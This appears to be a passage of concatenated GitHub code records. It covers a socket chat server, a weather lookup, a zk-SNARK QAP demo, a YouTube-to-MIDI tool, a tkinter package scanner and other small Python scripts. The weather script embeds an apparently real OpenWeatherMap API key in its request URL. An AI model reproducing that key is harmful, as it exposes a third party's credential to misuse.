pesan privat\n else:\n msg = msg.decode(\"utf-8\")\n msg2 = \"<{}>: {}\".format(src_username, msg)\n dest_sock_cli = clients[dest][0]\n send_msg(dest_sock_cli, msg2)\n\n #Disconnect client dan dihapus dari daftar client\n sock_cli.close()\n print(\"connection closed\", addr_cli)\n del clients[\"{}:{}\".format(addr_cli[0], addr_cli[1])]\n\n#send_broadcast(ke semua client)\ndef send_broadcast(clients, data, sender_addr_cli):\n for sock_cli, addr_cli, _ in clients.values():\n if not (addr_cli[0] == sender_addr_cli[0] and addr_cli[1] == sender_addr_cli[1]):\n send_msg(sock_cli, data)\n\n#send_msg(pesan ke client tertentu)\ndef send_msg(sock_cli, data):\n message = f'message|{data}'\n sock_cli.send(bytes(message, \"utf-8\"))\n\n#send_friends(ke semua teman)\ndef send_friends(clients, friends, src_username, data, sender_addr_cli):\n cur_friends = friends[src_username]\n for cur_friend in cur_friends:\n if cur_friend not in clients:\n continue\n sock_cli, addr_cli, _ = clients[cur_friend]\n if not (sender_addr_cli[0] == addr_cli[0] and sender_addr_cli[1] == addr_cli[1]):\n send_msg(sock_cli, data)\n\n#send_file(kirim file)\ndef send_file(sock_cli, filename, size, filedata, username):\n file = f'file|{username}|{filename}|{size}|'.encode('utf-8')\n file += filedata\n sock_cli.sendall(file)\n\n\n#Object socket server\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n#Bind server ke IP dan port tertentu\nserver_socket.bind(('0.0.0.0', 6666))\n\n#Server listen\nserver_socket.listen(5)\n\n#Dictionary untuk client dan friend\nclients = {}\nfriends = {}\n\ntry:\n while True:\n sock_cli, addr_cli = server_socket.accept()\n\n #Menerima username dari client\n src_username = sock_cli.recv(65535).decode(\"utf-8\")\n print(\" {} successfully joined\".format(src_username))\n\n #Buat Thread\n thread_cli = threading.Thread(target=read_msg, args=(clients, friends, sock_cli, addr_cli, src_username))\n thread_cli.start()\n\n #Menambah client baru ke dictionary\n clients[src_username] = (sock_cli, addr_cli, thread_cli)\n friends[src_username] = []\n\nexcept KeyboardInterrupt:\n #Menutup object server\n server_socket.close()\n sys.exit(0)\n","repo_name":"wardahnab/Tugas_3_Pemrograman_Jaringan","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71180798633","text":"# import sif_parser\nimport numpy as np\n# from numpy import unravel_index\n# import matplotlib.pyplot as plt\n# import pandas as pd\n# import xarray\n# import xarray as xr\n# import cv2 as cv\n# import os\n#\n# imag_data = []\n# nor_data = []\n# def readsif(path):\n# for filename in os.listdir(path):\n# print(filename)\n# data = xr.DataArray(sif_parser.xr_open(path + '/' + filename))\n# twodims = data.isel(Time = 0)\n# TwoD = twodims.values\n# print(TwoD)\n# Nor = cv.normalize(TwoD, None, 0, 255, cv.NORM_MINMAX, dtype=cv.CV_8UC1)\n# print(Nor)\n# # plt.imshow(TwoD)\n# # plt.title(filename)\n# # plt.show()\n# imag_data.append(TwoD)\n# nor_data.append(Nor)\n#\n#\n#\n#\n#\n# # def BrightestPoint(imag):\n# # Imag = imag_data[imag]\n# # index = unravel_index(Imag.argmax(),Imag.shape)\n# # return index\n# #\n# #\n#\n#\n\n#\n#\n#\n#\n#\n#\n#\n#\n#\n#\n# #\n# # da1 = da/da.max()\n# # #\n# # # c = np.argmax(da1)\n# # # # print(c)\n# # d = unravel_index(da1.argmax(),da1.shape)\n# # print(d)\n# # print(da1[d])\n#\n#\n#\n#\n#\n#\n# #\n# # plt.imshow(da1)\n# #\n# # plt.show()\n#\n#\n#\n#\n#\n#\n# # cv.imshow('da',da)\n# # cv.waitKey(0)\n# #\n# # # closing all open windows\n# # cv.destroyAllWindows()\nimport tifffile\nobjimage = []\n# def objreadtif(pathofrobber= '',pathofpositions = '',Shape =None):\ndef objreadtif(pathofrobber='',pathofpositions='',Shape=None):\n read_image = tifffile.imread(pathofrobber)\n np.save('',read_image)\n read_positions = tifffile.imread(pathofpositions)\n np.save('', read_positions)\n # read_positions = sum(read_positions[0:read_image.shape[0]])\n\n if Shape == None:\n for i in range(read_image.shape[0]):\n print(i)\n read = read_image[i,:,:]\n objimage.append(read)\n\n return objimage\n else:\n return read_positions\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n objreadtif()\n\n\n\n\n\n\n\n\n\n\n","repo_name":"sslaocinnnn/Photometric_Stereo_Normals_and_Surface","sub_path":"CaluculateNomral/ObjReadTif.py","file_name":"ObjReadTif.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32014759743","text":"import requests\nimport json\n\npaikkakunta = input(\"Anna pakkakunnan nimi: \")\n\npyyntö = f\"https://api.openweathermap.org/data/2.5/weather?q={paikkakunta}&appid=084a0b57bd89a0ea540a1c0ea1c738ca&units=metric\"\nvastaus = requests.get(pyyntö).json()\nprint(\"Lämpötila:\", json.dumps(vastaus[\"main\"][\"temp\"], indent=2),\"astetta.\")\n\nfor a in vastaus[\"weather\"]:\n print(\"Säätila:\", a[\"description\"])","repo_name":"ShadySeal/ohjelmisto1_","sub_path":"ohjelmisto2/moduuli12/tehtava2.py","file_name":"tehtava2.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21245786001","text":"import numpy as np\n\n# Lets prove we know the answer to x**3 + x + 5 == 35 (x = 5)\n\n# We break it down into these statements:\n\n# L1: s1 = x * x\n# L2: y = s1 * x\n# L3: s2 = y + x\n# L4: out = s2 + 5\n\n# Statements are of the form:\n# a * b = c\n\n# s1 = x * x\n# OR a * b = c, where a = x, b = x and c = s1\nL1 = np.array([\n # a b c\n [0, 0, 0], # 1\n [1, 1, 0], # x\n [0, 0, 0], # out\n [0, 0, 1], # s1\n [0, 0, 0], # y\n [0, 0, 0] # s2\n])\n\n# y = s1 * x\nL2 = np.array([\n # a b c\n [0, 0, 0], # 1\n [0, 1, 0], # x\n [0, 0, 0], # out\n [1, 0, 0], # s1\n [0, 0, 1], # y\n [0, 0, 0] # s2\n])\n\n# s2 = y + x\nL3 = np.array([\n # a b c\n [0, 1, 0], # 1\n [1, 0, 0], # x\n [0, 0, 0], # out\n [0, 0, 0], # s1\n [1, 0, 0], # y\n [0, 0, 1] # s2\n])\n\n# out = s2 + 5\nL4 = np.array([\n # a b c\n [5, 1, 0], # 1\n [0, 0, 0], # x\n [0, 0, 1], # out\n [0, 0, 0], # s1\n [0, 0, 0], # y\n [1, 0, 0] # s2\n])\n\na = np.array([L.transpose()[0] for L in (L1, L2, L3, L4)])\nb = np.array([L.transpose()[1] for L in (L1, L2, L3, L4)])\nc = np.array([L.transpose()[2] for L in (L1, L2, L3, L4)])\nprint(\"A\")\nprint(a)\nprint(\"B\")\nprint(b)\nprint(\"C\")\nprint(c)\n\n# The witness\ns = np.array([\n 1,\n 3,\n 35,\n 9,\n 27,\n 30\n])\nprint()\n\n#print(s * a * s * b - s * c)\nfor a_i, b_i, c_i in zip(a, b, c):\n assert sum(s * a_i) * sum(s * b_i) - sum(s * c_i) == 0\n\nprint(\"R1CS done.\")\nprint()\n\ndef factorial(x):\n r = 1\n for x_i in range(2, x + 1):\n r *= x_i\n return r\n\ndef combinations(n, r):\n return factorial(n) / (factorial(n - r) * factorial(r))\n\ndef lagrange(points):\n result = np.poly1d([0])\n for i, (x_i, y_i) in enumerate(points):\n poly = np.poly1d([y_i])\n for j, (x_j, y_j) in enumerate(points):\n if i == j:\n continue\n poly *= np.poly1d([1, -x_j]) / (x_i - x_j)\n #print(poly)\n #print(poly(1), poly(2), poly(3))\n result += poly\n return result\n\n# 1.5, -5.5, 7\n#poly = lagrange([(1, 3), (2, 2), (3, 4)])\n#print(poly)\n\ndef make_qap(a):\n a_qap = []\n a_polys = []\n for a_i in a.transpose():\n poly = lagrange(list(enumerate(a_i, start=1)))\n coeffs = poly.c.tolist()\n if len(coeffs) < 4:\n coeffs = [0] * (4 - len(coeffs)) + coeffs\n a_qap.append(coeffs)\n a_polys.append(poly)\n a_qap = np.array(a_qap)\n print(a_qap)\n return a_polys\n\nprint(\"A\")\na_polys = make_qap(a)\nprint(\"B\")\nb_polys = make_qap(b)\nprint(\"C\")\nc_polys = make_qap(c)\n\ndef check(polys, x):\n results = []\n for poly in polys:\n results.append(int(poly(x)))\n return results\n\nprint()\nprint(\"A results at x\", check(a_polys, 1))\nprint()\nprint(\"B results at x\", check(b_polys, 1))\nprint()\nprint(\"C results at x\", check(c_polys, 1))\n\ndef combine_polys(polys):\n r = np.poly1d([0])\n for s_i, p_i in zip(s, polys):\n r += s_i * p_i\n return r\n\nprint()\nprint()\nA = combine_polys(a_polys)\nprint(\"A =\")\nprint(A)\nB = combine_polys(b_polys)\nprint(\"B =\")\nprint(B)\nC = combine_polys(c_polys)\nprint(\"C =\")\nprint(C)\nprint()\nt = A * B - C\nprint(\"t =\")\nprint(t)\n\n# 4 statements in our R1CS: L1, L2, L3, L4\ndivisor_poly = np.poly1d([1])\nfor x in range(1, 4 + 1):\n divisor_poly *= np.poly1d([1, -x])\n\nquot, remainder = np.polydiv(t, divisor_poly)\nassert len(remainder.c) == 1\nprint()\nprint(\"Result of QAP:\")\nprint(int(remainder.c[0]))\n","repo_name":"darkrenaissance/darkfi","sub_path":"script/research/zk/groth16/qap.py","file_name":"qap.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","stars":973,"dataset":"github-code","pt":"72"} +{"seq_id":"8960182182","text":"import os\nimport shutil\nimport numpy as np\n\n\nos.chdir('../cat_vs_dog_datasets')\n# print(os.listdir('./train'))\nfile_names = os.listdir('./train')\nif not os.path.exists('val'):\n os.mkdir('./val')\n\nwhile len(os.listdir('./val')) < 5000:\n file_name = np.random.choice(os.listdir('./train'))\n shutil.move('./train/' + file_name, './val/' + file_name)\n\n\n\n# shutil.move()\n","repo_name":"qukequke/tutor","sub_path":"torch_tutor/scipt_for_val.py","file_name":"scipt_for_val.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23610481604","text":"#!/usr/bin/python3\n\nimport sys\nimport requests\nfrom bs4 import BeautifulSoup\nfrom googlesearch import search\n\nq=' '.join(sys.argv[1:])\nprint(\"Query: \" + q)\n\ns=search(q, stop=5)\n\nfor url in s:\n print(\"Result URL: \" + url)\n\n # Get first result\n page=requests.get(url)\n\n # find all code blocks\n soup = BeautifulSoup(str(page.content), features=\"lxml\")\n code = soup.findAll('code')\n\n for block in code:\n # replace br\n for br in block.find_all(\"br\"):\n br.replace_with(\"\\n\")\n\n # Print out one by one\n print(block.decode_contents())\n input(\"\\n\\nPress Enter for next code block...\\n\")\n\n if len(code) > 0:\n break\n else:\n print(\"No solution found, checking next URL\")\n\n \n\n","repo_name":"ayoung012/miracle-worker","sub_path":"miracleworker.py","file_name":"miracleworker.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27596811437","text":"import pandas as pd\nimport math\nfrom collections import Counter\nimport os\nimport matplotlib\nimport sys\nimport numpy as np\n\ndef summary(path):\n data = pd.read_csv(path)\n text = list(data['text'])\n label = data['label']\n sample_num = len(text)\n # \n words_len = list(map(len_def, text))\n max_len = max(words_len)\n min_len = min(words_len)\n avg_len = sum(words_len) / sample_num\n words_len_cut = list(map(len_def1, text))\n avg_len_cut = sum(words_len_cut) / sample_num\n\n clusters = Counter(label)\n clusters_num = len(clusters)\n cluster_r = max(clusters.values()) / min(clusters.values())\n print('cluster_distribution:', sorted(np.array(list(clusters.values())) / sample_num))\n print('cluster_num:', clusters_num)\n #print('clusters:', clusters)\n print('sample_num:', sample_num)\n #print('max len:', max_len)\n #print('min len:', min_len)\n #print('cluster max/min:', cluster_r)\n #print('avg len:', avg_len)\n #print('avg_len_cut:', avg_len_cut)\n \ndef len_def(text):\n return len(text.split())\n\ndef len_def1(text):\n tmp = len(text.split())\n return tmp if tmp <= 32 else 32\n\ndef get_text(dataname, datapath='/home/hml/text_cluster/sccl/AugData/augmented-datasets', target='./agnews.csv'):\n source = os.path.join(datapath, dataname+\".csv\")\n train_data = pd.read_csv(source)\n data1 = train_data[train_data['label'] == 3][:2000]\n data2 = train_data[train_data['label'] == 2][:1200]\n data3 = train_data[train_data['label'] == 1][:800]\n new_data = pd.concat([data1, data2, data3])\n new_data.to_csv(target, index=False)\n return\n\nif __name__ == '__main__':\n if len(sys.argv) == 1:\n data_name = 'searchsnippets_trans_subst_10'\n get_text(dataname=data_name, target='./search.csv')\n elif sys.argv[1] == 'sum':\n root_path = '/home/hml/text_cluster/sccl/AugData/augmented-datasets'\n data_names = ['agnewsdataraw-8000_trans_subst_10.csv', 'stackoverflow_trans_subst_10.csv', 'biomedical_trans_subst_10.csv', 'searchsnippets_trans_subst_10.csv', 'TS_trans_subst_10.csv', 'T_trans_subst_10.csv', 'S_trans_subst_10.csv', 'tweet-original-order_trans_subst_10.csv']\n #root_path = '/home/hml/text_cluster'\n #data_names = ['agnews.csv']\n for data_name in data_names:\n print(data_name)\n path = os.path.join(root_path, data_name)\n summary(path)\n elif sys.argv[1] == 'data':\n #data_name = 'agnewsdataraw-8000_trans_subst_10'\n data_name = 'searchsnippets_trans_subst_10'\n get_text(dataname=data_name, target='./search.csv')","repo_name":"hmllmh/RSTC","sub_path":"dataloader/summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"22605941547","text":"from youtube_dl import YoutubeDL\nfrom os.path import join, dirname, splitext\nfrom os import remove\nimport subprocess\nimport platform\nfrom typing import List\n\nMASK = join(dirname(__file__), \"syn2midi\", \"mask.bmp\")\nMASK88 = join(dirname(__file__), \"syn2midi\", \"mask88.bmp\")\n\n\ndef download_and_convert(youtube_url: str, mask_path: str = MASK88, output_name: str = None, start_time: int = None, end_time: int = None, transpose: int = 0, additional_arguments: List[str] = [], keep_video: bool = False) -> None:\n \"\"\"\n Download a Synthesia piano tutorial from YouTube and convert it to MIDI format.\n\n Parameters\n ----------\n youtube_url: str\n The YouTube URL for a Synthesia piano tutorial.\n mask_path: str\n Path to a BMP image file to be used as mask.\n output_name: str\n Path to output MIDI file.\n start_time: int | None\n Vide start time in seconds.\n end_time: int | None\n Vide end time in seconds.\n transpose: int\n Transpose notes shift, can be negative.\n additional_arguments: List[str]\n List of additional arguments to be passed to syn2midi.\n keep_video: bool\n If set to True, will keep the downloaded video instead of deleting it when done.\n \"\"\"\n filename = _download(youtube_url)\n output_name = output_name or splitext(filename)[0] + \".mid\"\n\n syn2midi = _get_syn2midi()\n args = [syn2midi, \"-i\", filename, \"-o\",\n output_name, \"-m\", mask_path, \"-t\", str(transpose)]\n args += [\"-s\", str(start_time)] if start_time is not None else []\n args += [\"-e\", str(end_time)] if end_time is not None else []\n args += additional_arguments\n\n print(output_name)\n\n subprocess.run(args)\n\n if not keep_video:\n print(\"Deleting video...\")\n try:\n remove(filename)\n except Exception:\n print(\"Could not delete video.\")\n else:\n print(\"Video deleted.\")\n\n\ndef _download(url: str) -> str:\n with YoutubeDL() as ydl:\n format_id = _get_format_id(ydl, url)\n\n filename = []\n options = {\n \"format\": format_id,\n \"progress_hooks\": [_get_hook(filename)]\n }\n with YoutubeDL(options) as ydl:\n ydl.download([url])\n\n return filename[0]\n\n\ndef _get_hook(result: list):\n def hook(progress):\n if progress[\"status\"] == \"finished\":\n result.append(progress[\"filename\"])\n\n return hook\n\n\ndef _get_format_id(ydl: YoutubeDL, url: str):\n meta = ydl.extract_info(url, download=False)\n formats = meta.get(\"formats\", [meta])\n mp4_formats = [format for format in formats if format[\"ext\"] == \"mp4\"]\n mp4_720 = [format[\"format_id\"]\n for format in mp4_formats if format[\"height\"] == 720]\n if mp4_720:\n return mp4_720[0]\n\n mp4_formats.sort(key=lambda format: format[\"height\"])\n return mp4_formats[-1]\n\n\ndef _get_syn2midi():\n systems = {\n \"Windows\": join(\"windows\", \"syn2midi.exe\")\n }\n\n os = platform.system()\n\n if os not in systems:\n raise OSError(\"Operating system not supported\")\n\n executable = systems[os]\n\n return join(dirname(__file__), \"syn2midi\", executable)\n\n\nSYN2MIDI = _get_syn2midi()\n","repo_name":"AntarEspadas/youtube2midi","sub_path":"youtube2midi/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"17620701742","text":"from visdom import Visdom\nimport numpy as np\n\nimport time\n\nviz = Visdom()\nx,y = 0,0\nwin = viz.line(\n X=np.array([x]),\n Y=np.array([y]),\n opts=dict(title='two lines')\n )\n\nfor i in range(10):\n x += i\n y += i*i\n viz.line(\n X = np.array([x]),\n Y = np.array([y]),\n win=win,\n update='append'\n )\n time.sleep(5)\n","repo_name":"csliuwei/learn_visdom","sub_path":"03_line_update.py","file_name":"03_line_update.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73818441192","text":"from cx_Freeze import setup, Executable\n\nimport sys\n\nfrom src.utility import get_environment\n\nenvironment = get_environment('src\\\\assets\\\\environment.json')\n\nbase = 'Win32GUI' if sys.platform == 'win32' else None\n\nshortcut_table = [\n (\"DesktopShortcut\", # Shortcut\n \"DesktopFolder\", # Directory_\n \"Mer.io\", # Name\n \"TARGETDIR\", # Component_\n \"[TARGETDIR]mer.io.exe\", # Target\n None, # Arguments\n None, # Description\n None, # Hotkey\n '', # Icon\n None, # IconIndex\n None, # ShowCmd\n 'TARGETDIR' # WkDir\n )\n ]\n\nbuild_options = {\n 'packages': [],\n 'excludes': [],\n 'include_files': ['src/assets'],\n}\n\nmsi_options = {\n 'target_name': 'mer.io_{0}_setup'.format(environment['version']),\n 'upgrade_code': '{2967c71a-9bf5-48be-b9db-b2c5a6c9fab6}',\n 'data': {'Shortcut': shortcut_table}\n}\n\nexecutables = [\n Executable('src/main.py',\n base=base,\n target_name='mer.io',\n icon='src/assets/icons/app_icon.ico')\n]\n\nsetup(name='mer.io',\n version=environment['version'],\n description='mer extraction tool',\n options={\n 'build_exe': build_options,\n 'bdist_msi': msi_options\n },\n executables=executables,\n )\n","repo_name":"jooppoelman/mer.io","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23206588960","text":"from pdf2image import convert_from_path, convert_from_bytes\n\nfrom pdf2image.exceptions import (\n PDFInfoNotInstalledError,\n PDFPageCountError,\n PDFSyntaxError\n)\n\nimport os\n\nfolder = os.getcwd()\nprint(folder)\n\nfor files in folder:\n for filename in os.listdir():\n full = os.path.join(folder, filename)\n #print(\"Part\", part)\n print(\"Full\", full)\n\n images = convert_from_path(full)\n \n for i in range(len(images)):\n \n images[i].save('page'+ str(i) +'.jpg', 'JPEG')\n \n","repo_name":"holmesian17/pdf_obits_files","sub_path":"single_folder_pdf_jpg.py","file_name":"single_folder_pdf_jpg.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30676850766","text":"# -*- coding: utf-8 -*- \nimport numpy as np \nimport matplotlib.pyplot as plt\nx = np.linspace(-1, 1, 10000) \ny = (x**2/2+x+1)\nz = (2.7**x)\n \nplt.figure(figsize=(8,4)) \nplt.plot(x,y,color=\"red\",linewidth=2) \nplt.plot(x,z,color=\"blue\") \nplt.xlabel(\"Time(s)\") \nplt.ylabel(\"Volt\") \nplt.title(\"PyPlot First Example\") \nplt.ylim(-1,3) \nplt.legend() \nplt.show() ","repo_name":"youngda/numpy","sub_path":"x.py","file_name":"x.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26198648965","text":"\n\n#import library modules\nfrom tkinter import *\nfrom tkinter import filedialog\nfrom collections import Counter\nimport datetime\nimport xlrd\nimport xlwt\n\n\n#current time & date\nnow = datetime.datetime.now()\nprint (now.strftime(\"%m-%d-%Y\"))\n\n#tkinter window\nroot = Tk()\n\nroot.iconbitmap('icon.ico')\n\n#tkinter window title\nroot.title(\"Package Scanner\")\n#tkinter window size\nroot.geometry(\"550x500\")\n\n\n#Entrada Label\nentradaLabel = Label(root, text=\"Entrada\")\nentradaLabel.grid(row = 2, column = 0, sticky = NSEW,columnspan = 1)\n\n#Total in Label\nquantityLabel = Label(root, text=\"Total In\")\nquantityLabel.grid(row = 2, column = 2 , sticky = NSEW, columnspan = 1)\n\n#Total Out Label\nquantityOutLabel = Label(root, text=\"Total Out\",width=15)\nquantityOutLabel.grid(row = 2, column = 9 , sticky = NSEW, columnspan = 1)\n\n#Instructions to scan Label\nentry1Label = Label(root, text=\"Scan Package:\")\nentry1Label.grid(row = 0, column = 0 , sticky = NSEW)\n\n#Salida Label\nsalidaLabel = Label(root, text=\"Salida\",width=15)\nsalidaLabel.grid(row = 2, column = 7 , sticky = NSEW, columnspan = 1)\n\n\n#save and send buttons\nbutton1 = Button(root,text = 'Save', fg='green')\nbutton2 = Button(root,text = 'Send', fg='red')\n#button1.grid(row=3,column=0)\n#button2.grid(row = 3 , column = 1)\n\n#Scanner Entry Field\nentry1 = Entry(root)\nentry1.grid(row = 0,column = 2,columnspan = 3)\nentry1.focus_set()\n\nquitButton = Button(root,text=\"Quit\", command = root.quit )\n#quitButton.grid(row=1,column=12)\n\n\n\n#Define Variables and Arrays\nscanIn = []\nscanOut = []\nstartRowSave = 1\nstartRow = 3\ninCount=0\noutCount=0\n\n\n#Menu Taskbar\nmenu = Menu(root)\nroot.config(menu=menu)\nsubMenu = Menu(menu)\nfileMenu = Menu(menu)\nmenu.add_cascade(label=\"File\", menu=fileMenu)\nmenu.add_cascade(label=\"Scan Mode\", menu=subMenu)\n\n\n#Menu Taskbar Commands\n\n#start file save\ndef file_save():\n f = filedialog.asksaveasfile(mode='w', defaultextension=\".txt\",initialdir = \"%userprofile%/desktop/\",title = \"Save file\",filetypes = ((\"Text file\",\"*.txt\"),(\"Excel file\",\"*.xls\"),(\"all files\",\"*.*\")))\n if f is None: # asksaveasfile return `None` if dialog closed with \"cancel\".\n return\n text2saveFurgon = str(furgon.get())\n f.write(\"Furgon\")\n f.write(\"\\n\")\n f.write(text2saveFurgon)\n f.write(\"\\n\")\n f.write(\"\\n\")\n f.write(\"Total In\")\n #end check if list empty\n\n f.write(\"\\n\")\n #check if list is empty\n #if item in storedIn:\n text2saveIn = str(inCounter)\n f.write(text2saveIn)\n f.write(\"\\n\")\n f.write(\"\\n\")\n f.write(\"Total Out\")\n f.write(\"\\n\")\n #if item in storedOut:\n text2saveOut = str(outCounter)\n f.write(text2saveOut)\n f.write(\"\\n\")\n #f.write(\"Scan Details\")\n #f.write(\"\\n\")\n #f.write(timestamp)\n f.close()\n print(storedIn,storedOut)\n#end file save\n\ndef entradaMode():\n global mode\n print(\"Entrada Selected\")\n mode = \"Entrada\"\n select = Label(root, text=\" Scan mode: \" + mode, fg='green',width = 17)\n select.grid(row=0, columnspan=2, sticky=NSEW)\n\ndef salidaMode():\n print(\"Salida Selected\")\n global mode\n global furgon\n global furgonNumber\n global furgonLabel\n\n mode = \"Salida\"\n select = Label(root, text=\"Scan mode: \" + mode, fg='red',width = 17)\n select.grid(row=0, columnspan=2, sticky=NSEW)\n\n # Furgon Entry Field\n furgonLabel = Label(root, text=\"Furgon: \")\n furgonLabel.grid(row=0, column= 8, sticky=E,columnspan=1)\n furgon = Entry(root)\n furgonNumber = furgon.get()\n furgon.grid(row=0, column=9, columnspan=1,sticky=E)\n #\n\nclass savetoexcel:\n\n def save2Excel():\n\n style0 = xlwt.easyxf('font: name Times New Roman, color-index red, bold on',\n num_format_str='#,##0.00')\n style1 = xlwt.easyxf(num_format_str='D-MMM-YY')\n\n wb = xlwt.Workbook()\n ws = wb.add_sheet('A Test Sheet', cell_overwrite_ok=True)\n wsLog = wb.add_sheet('Scan Log', cell_overwrite_ok=True)\n\n ws.write(0, 0, \"Total In\", style0)\n ws.write(1, 0, str(storedIn) , style1)\n ws.write(2, 0, )\n ws.write(0, 1, \"Total Out\", style0)\n ws.write(1, 1, str(storedOut))\n ws.write(0, 2, \"Furgon\", style0)\n ws.write(1, 2, furgonNumber, style1)\n ws.write(2, 2, xlwt.Formula(\"A3+B3\"))\n wsLog.write(0, 0, \"Scan Log\", style0)\n wsLog.write(1, 0, timestamp, style1)\n print (content)\n\n\n wb.save('Z:/Reciving Almacen/Entradas y Salidas/example.xls')\n\n def saveScan(startRowIn, timestamp):\n\n\n style0 = xlwt.easyxf('font: name Times New Roman, color-index red, bold on',\n num_format_str='#,##0.00')\n style1 = xlwt.easyxf(num_format_str='D-MMM-YY')\n\n wb = xlwt.Workbook()\n ws = wb.add_sheet('A Test Sheet', cell_overwrite_ok=False)\n wsLog = wb.add_sheet('Scan Log', cell_overwrite_ok=False)\n wsLog.write(0, 0, \"Scan Log\", style0)\n\n wsLog.write(startRowIn, 0, timestamp, style1)\n print(\"printed from savescan\")\n wb.save('Z:/Reciving Almacen/Entradas y Salidas/' + now.strftime(\"%m-%d-%Y\") + '.xls')\n\n\n\nsubMenu.add_command(label=\"Entrada\", command=entradaMode)\nsubMenu.add_command(label=\"Salida\", command=salidaMode)\n\nfileMenu.add_command(label=\"Save As\",command = file_save)\n#fileMenu.add_command(label=\"Save to Excel\",command = savetoexcel.save2Excel)\n\nfileMenu.add_command(label=\"Exit\", command=root.quit)\n\n\nmode = \"\"\ncontent = entry1.get()\ntimestamp = \"Package \" + content + \" Scanned at \" + now.strftime(\"%m-%d-%Y %H:%M\")\n\nsubMenu.add_separator()\n\ndef func(event):\n\n\n global inCount\n global outCount\n global storedIn\n global storedOut\n content = entry1.get()\n\n\n if content == \"\":\n print(\"No Package Scanned\")\n print(mode)\n\n elif mode == \"Entrada\":\n timestamp = \"Package \" + content + \" Scanned at \" + now.strftime(\"%m-%d-%Y %H:%M\")\n print( timestamp)\n\n scanIn.append(content)\n\n startRowIn = 2\n for i in scanIn:\n inLabel = Label(root, text=i)\n inCount += 1\n inLabel.grid_forget()\n startRowIn = startRowIn + 1\n\n\n\n inLabel.grid(sticky=NSEW, column=0,row=startRowIn)\n global inCounter\n inCounter = Counter(scanIn)\n inCounter = inCounter.most_common()\n\n startRow = 3\n for value, count in inCounter:\n storedIn = value, \"-\" ,count\n counterLabel = Label(root, text = storedIn)\n counterLabel.grid(column=2,columnspan = 1,row = startRow, sticky = NSEW)\n startRow = startRow + 1\n\n print(storedIn)\n savetoexcel.saveScan(startRowSave,timestamp)\n\n entry1.delete(0, 'end')\n\n\n else:\n print( \"Package \" + content + \" Scanned at \" + now.strftime(\"%m-%d-%Y %H:%M\"))\n scanOut.append(content)\n\n startRowOut = 2\n for i in scanOut:\n outLabel = Label(root, text=i,width=15)\n outLabel.grid_forget()\n outCount += 1\n startRowOut = startRowOut + 1\n\n outLabel.grid(sticky=W, column=7,row=startRowOut)\n\n entry1.delete(0, 'end')\n\n global outCounter\n outCounter = (Counter(scanOut))\n outCounter = outCounter.most_common()\n\n startRow = 3\n for value, count in outCounter:\n storedOut = value, \"-\", count\n counterOutLabel = Label(root, text=storedOut,width=15)\n counterOutLabel.grid(column=9, columnspan=1, row=startRow, sticky=NSEW)\n startRow = startRow + 1\n\n if scanIn == scanOut:\n counterOutLabel.config(fg=\"green\")\n furgonLabel.config(fg=\"green\")\n\n\n entry1.delete(0, 'end')\n\n\n\n\n\n #inCounter = Counter(scanIn)\n #inCounter = inCounter.most_common()\n # for value, count in inCounter:\n\n # print(value, count)\n\n\n # totalInLabel = Label(root, text=inCounter)\n # totalInLabel.grid(row= 3, column = 8)\n\n\n\nentradaMode()\nroot.bind('', func)\n\n\n\nroot.mainloop()","repo_name":"coolrey3/python","sub_path":"Programa de Entrada/package scanner.py","file_name":"package scanner.py","file_ext":"py","file_size_in_byte":7961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38583605427","text":"from real_data.plot_brains import plot_blobs\nfrom build_data import build_coefs\nfrom matplotlib import pyplot as plt\nfrom matplotlib.lines import Line2D\nimport numpy as np\nfrom real_data.utils import get_labels\n\n\nparams = {\"legend.fontsize\": 19,\n \"axes.titlesize\": 17,\n \"axes.labelsize\": 16,\n \"xtick.labelsize\": 14,\n \"ytick.labelsize\": 14}\nplt.rcParams.update(params)\n\nn_subjects = 6\nnames = [f\"Subject {i}\" for i in range(1, n_subjects + 1)]\ncolors = plt.cm.hsv(np.linspace(0, 1, n_subjects))[:, :-1]\ncolors[0] = np.array([0, 0, 0])\nlegend_models = [Line2D([0], [0], color=\"w\",\n markerfacecolor=color, markersize=13,\n linewidth=3,\n marker=\"o\",\n label=name)\n for color, name in zip(colors, names)]\nf, ax = plt.subplots(1, 1, figsize=(8, 2))\nax.legend(handles=legend_models, ncol=3, frameon=False,\n labelspacing=1.5)\nax.axis(\"off\")\nplt.savefig(\"real_data/fig/coefs_legend.pdf\")\n\n\ndataset = \"camcan\"\nseed = 0\noverlap = 50\nn_sources = 5\n\nlabel_names = [\"S_interm_prim-Jensen\",\n \"G_and_S_transv_frontopol\",\n \"S_oc_sup_and_transversal\",\n \"Lat_Fis-ant-Horizont\",\n 